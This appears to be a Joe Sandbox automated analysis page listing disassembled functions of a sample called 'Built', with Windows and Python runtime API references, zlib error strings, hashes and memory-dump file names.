API String ID: 3215553584-0
Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction ID: 7e2b80a5280c0e60023e0bdf626db0267802b0880f429fa676defa7570039e0a
Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
Instruction Fuzzy Hash: A041E57290820287EE34DB15E95227973A5FB95B84F100135DA8EC7692CF2FE442DF93

Function 00007FF626647F80 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF62664802A

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _fread_nolock
String ID:
API String ID: 840049012-0
Opcode ID: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
Instruction ID: fabc97366a2ef45bee363c737e766f59de5ae79455965b615c215ab08a572023
Opcode Fuzzy Hash: 7d2ffc6bbc79ae5a2c74bce1da3196692eb5c07e0d710da80585856a36faa807
Instruction Fuzzy Hash: 9721D321B196D285FE20AA126D153BAA651BF45FC4F8C4434EE4D87786CEBEE041EB43

Function 00007FF62665B9AC Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF62665BA32

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction ID: 2bf0ff5176d4ec4f0db51885bd11526d9dfb6d2915a44a865c1ee82f8342a4e4
Opcode Fuzzy Hash: 2d5c35b5412ec9e3d722ee101ab37b91f6ea8aa9dcca92d1d4e84e7f868c2b8f
Instruction Fuzzy Hash: B731BC71A1864386EB505B699C5237C2650BF80B94F420135E92D937D3CF7EA841AF23

Function 00007FF6266599D1 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6266599FF

Part of subcall function 00007FF626659AF8: GetModuleHandleExW.KERNEL32 ref: 00007FF626659B1D
Part of subcall function 00007FF626659AF8: GetProcAddress.KERNEL32 ref: 00007FF626659B33
Part of subcall function 00007FF626659AF8: FreeLibrary.KERNEL32 ref: 00007FF626659B5A

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction ID: fc516364c0378af873730cb191420e1d898226891a988f9423845cf8dc19f2d6
Opcode Fuzzy Hash: c67799cafce48778543f3f8f4be5d8193b6380671b5390c3378b203fc6564281
Instruction Fuzzy Hash: 7C217C32E047828AEF258F64C8463EC37A0FB04718F480636D66D86AD6DF39D584DF52

Function 00007FF626656004 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626655F69

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction ID: 2c4e2b31da8693a1c6bd18d1e148f76c901f399f5fa8e74a3c6186818cfd95c5
Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
Instruction Fuzzy Hash: FC113322A1C64282EE609F51AC0617EA264BFC5B84F554031EB4CD7A97DF3FE540AF03

Function 00007FF6266663C4 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266663E7

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction ID: 3d8171733539e834dccf6e7ebd3eec6aa2586efd80bdd260be4ee267cc2bfb07
Opcode Fuzzy Hash: 3ea3ce3b0d542221f39e0ec21b1c29adddc4a64aa4be1ebee55588f6cedcbaa9
Instruction Fuzzy Hash: EC219572618A8286DF618F18F88137976A0FB84B94F244234E69DC76D5DF3ED8009F03

Function 00007FF62665042C Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF626650480

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: b72a2586c355e1571f14289c0352343f8043bef44ffe24a25b0d99a6c6feba17
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: C101C421A0878281EE04DF529D02169B691BF95FE0F184631EE5C97BD7CE3EE0116B03

Function 00007FF62665EC08 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,00000000,00007FF62665B39A,?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA), ref: 00007FF62665EC5D

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction ID: b8d2daae034e60b0ed2670bd211881836da5a23a921b5b13e5b1356234703c3f
Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
Instruction Fuzzy Hash: 8FF06D40F0920781FE545AA69CA33B516907F89B80F5C5530C91EDA3D3EF1EE480AB53

Function 00007FF62665D66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(?,?,?,00007FF626650D00,?,?,?,00007FF62665236A,?,?,?,?,?,00007FF626653B59), ref: 00007FF62665D6AA

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction ID: 9cf904d9af9fda3d3e472da0eb2d2e5a5741f22c8af222092ad4e0c6ce2fb6e9
Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
Instruction Fuzzy Hash: 6EF0FE10B0934785FE5467729D5267922907F957A0F080730ED2ED57D3DE2EA441AF17

Non-executed Functions

Function 00007FF626645820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645830
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645842
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645879
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664588B
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458A4
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458B6
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458CF
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458E1
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266458FD
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664590F
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664592B
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664593D
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645959
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF62664596B
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645987
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF626645999
GetProcAddress.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459B5
GetLastError.KERNEL32(?,00007FF6266464BF,?,00007FF62664336E), ref: 00007FF6266459C7

Strings

PyUnicode_AsUTF8, xrefs: 00007FF626645EB3, 00007FF626645ED5
PyConfig_SetWideStringList, xrefs: 00007FF626645A63, 00007FF626645A85
PyErr_Fetch, xrefs: 00007FF626645ABF, 00007FF626645AE1
PyErr_Print, xrefs: 00007FF626645B49, 00007FF626645B6B
PyConfig_Read, xrefs: 00007FF6266459D9, 00007FF6266459FB
Py_IsInitialized, xrefs: 00007FF626645921, 00007FF626645943
PyUnicode_Decode, xrefs: 00007FF626645EE1, 00007FF626645F03
PyErr_Restore, xrefs: 00007FF626645B77, 00007FF626645B99
PyObject_CallFunction, xrefs: 00007FF626645CE7, 00007FF626645D09
PySys_GetObject, xrefs: 00007FF626645E57, 00007FF626645E79
Py_Finalize, xrefs: 00007FF6266458C5, 00007FF6266458E7
PyConfig_SetBytesString, xrefs: 00007FF626645A07, 00007FF626645A29
PyUnicode_FromString, xrefs: 00007FF626645F6B, 00007FF626645F8D
PyModule_GetDict, xrefs: 00007FF626645CB9, 00007FF626645CDB
PyImport_ImportModule, xrefs: 00007FF626645C2F, 00007FF626645C51
PyConfig_Clear, xrefs: 00007FF62664597D, 00007FF62664599F
PySys_SetObject, xrefs: 00007FF626645E85, 00007FF626645EA7
Py_InitializeFromConfig, xrefs: 00007FF6266458F3, 00007FF626645915
PyObject_CallFunctionObjArgs, xrefs: 00007FF626645D15, 00007FF626645D37
PyImport_ExecCodeModule, xrefs: 00007FF626645C01, 00007FF626645C23
PyConfig_InitIsolatedConfig, xrefs: 00007FF6266459AB, 00007FF6266459CD
PyImport_AddModule, xrefs: 00007FF626645BD3, 00007FF626645BF5
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF626645DCD, 00007FF626645DEF
Py_DecodeLocale, xrefs: 00007FF62664586F, 00007FF626645891
PyObject_GetAttrString, xrefs: 00007FF626645D43, 00007FF626645D65
PyErr_Clear, xrefs: 00007FF626645A91, 00007FF626645AB3
Py_ExitStatusException, xrefs: 00007FF62664589A, 00007FF6266458BC
Failed to get address for %hs, xrefs: 00007FF626645851
PyErr_NormalizeException, xrefs: 00007FF626645AED, 00007FF626645B0F
Py_PreInitialize, xrefs: 00007FF62664594F, 00007FF626645971
PyRun_SimpleStringFlags, xrefs: 00007FF626645DFB, 00007FF626645E1D
PyUnicode_Join, xrefs: 00007FF626645F99, 00007FF626645FBB
PyConfig_SetString, xrefs: 00007FF626645A35, 00007FF626645A57
GetProcAddress, xrefs: 00007FF626645858
PyUnicode_Replace, xrefs: 00007FF626645FC7, 00007FF626645FE9
Py_DecRef, xrefs: 00007FF626645826, 00007FF626645848
PyMarshal_ReadObjectFromString, xrefs: 00007FF626645C5D, 00007FF626645C7F
PyMem_RawFree, xrefs: 00007FF626645C8B, 00007FF626645CAD
PyStatus_Exception, xrefs: 00007FF626645E29, 00007FF626645E4B
PyObject_Str, xrefs: 00007FF626645D9F, 00007FF626645DC1
PyUnicode_FromFormat, xrefs: 00007FF626645F3D, 00007FF626645F5F
PyEval_EvalCode, xrefs: 00007FF626645BA5, 00007FF626645BC7
PyUnicode_DecodeFSDefault, xrefs: 00007FF626645F0F, 00007FF626645F31
PyErr_Occurred, xrefs: 00007FF626645B1B, 00007FF626645B3D
PyObject_SetAttrString, xrefs: 00007FF626645D71, 00007FF626645D93

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: a3537bc7702626fedf611ebc0086da936d06d572064df9dc0e86523033db434b
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 1822C124A0EF47E2FE249B65BD241B427A5BF45785F445036C82E82260FF7EB158BB43

Function 00007FF62666411C Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF62666416A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF6266647D6
_invalid_parameter_noinfo.LIBCMT ref: 00007FF62666494C
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626664C0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626664E2A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF626665067
memcpy_s.LIBCPMT ref: 00007FF626665142
memcpy_s.LIBCPMT ref: 00007FF6266651ED
memcpy_s.LIBCPMT ref: 00007FF6266652BC

Strings

1#SNAN, xrefs: 00007FF62666427A
1#INF, xrefs: 00007FF626664293
1#QNAN, xrefs: 00007FF626664283
1#IND, xrefs: 00007FF626664257

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction ID: 7b60058297264045d02e951dcfef32ccd0fed4915d87c95fb132ac9cc0fafedf
Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
Instruction Fuzzy Hash: 14B2E572A182938BEB648E64E9417FD37A1FB54388F505135DA0D97E88DF3EA900DF42

Function 00007FF62664AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON

Download Yara Rule

Strings

invalid distances set, xrefs: 00007FF62664B210
invalid distance too far back, xrefs: 00007FF62664B6E0
too many length or distance symbols, xrefs: 00007FF62664AEB6
invalid literal/length code, xrefs: 00007FF62664B452
invalid distance code, xrefs: 00007FF62664B624
invalid code -- missing end-of-block, xrefs: 00007FF62664B136
invalid code lengths set, xrefs: 00007FF62664AE9D
invalid bit length repeat, xrefs: 00007FF62664B109
invalid literal/lengths set, xrefs: 00007FF62664B1A3

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID:
String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
API String ID: 0-2665694366
Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction ID: 3a3b5baf203383577ecb38370af0614d831d4d124766a4c08948c663af424bfe
Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
Instruction Fuzzy Hash: 3652F676A146A687DBA48F14C868BBE3BA9FB44340F014139E64AC7784DF7ED840DF42

Function 00007FF62664D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF62664D1B8
RtlCaptureContext.KERNEL32 ref: 00007FF62664D1E5
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF62664D1FF
RtlVirtualUnwind.KERNEL32 ref: 00007FF62664D240
IsDebuggerPresent.KERNEL32 ref: 00007FF62664D294
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF62664D2B1
UnhandledExceptionFilter.KERNEL32 ref: 00007FF62664D2BC

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction ID: c40da157341b93ed3d445747ff0f812bf0ff7450512b2b97c9b108885229dc9c
Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
Instruction Fuzzy Hash: CF312F72A08B8286EB609F60EC503EE73A4FB84744F44443ADA4D87B94EF7DD558DB12

Function 00007FF626665C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF626665CB5

Part of subcall function 00007FF626665608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666561C

Part of subcall function 00007FF62665A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9CE
Part of subcall function 00007FF62665A9B8: GetLastError.KERNEL32(?,?,?,00007FF626662D92,?,?,?,00007FF626662DCF,?,?,00000000,00007FF626663295,?,?,?,00007FF6266631C7), ref: 00007FF62665A9D8

Part of subcall function 00007FF62665A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A979
Part of subcall function 00007FF62665A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF62665A94F,?,?,?,?,?,00007FF62665A83A), ref: 00007FF62665A99E

_get_daylight.LIBCMT ref: 00007FF626665CA4

Part of subcall function 00007FF626665668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF62666567C

_get_daylight.LIBCMT ref: 00007FF626665F1A
_get_daylight.LIBCMT ref: 00007FF626665F2B
_get_daylight.LIBCMT ref: 00007FF626665F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF62666617C), ref: 00007FF626665F63

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction ID: ae37007ee07be871dcb339d4716e81cd2b541fbdac04316a19f48e672b003f8e
Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
Instruction Fuzzy Hash: 43D1AF32A0824386EF20AF26EC521B96751FF84794F548136EA0DC7696DF3EE441EB43

Function 00007FF62665A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF62665A6FD
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF62665A715
RtlVirtualUnwind.KERNEL32 ref: 00007FF62665A750
IsDebuggerPresent.KERNEL32 ref: 00007FF62665A789
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF62665A793
UnhandledExceptionFilter.KERNEL32 ref: 00007FF62665A79E

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

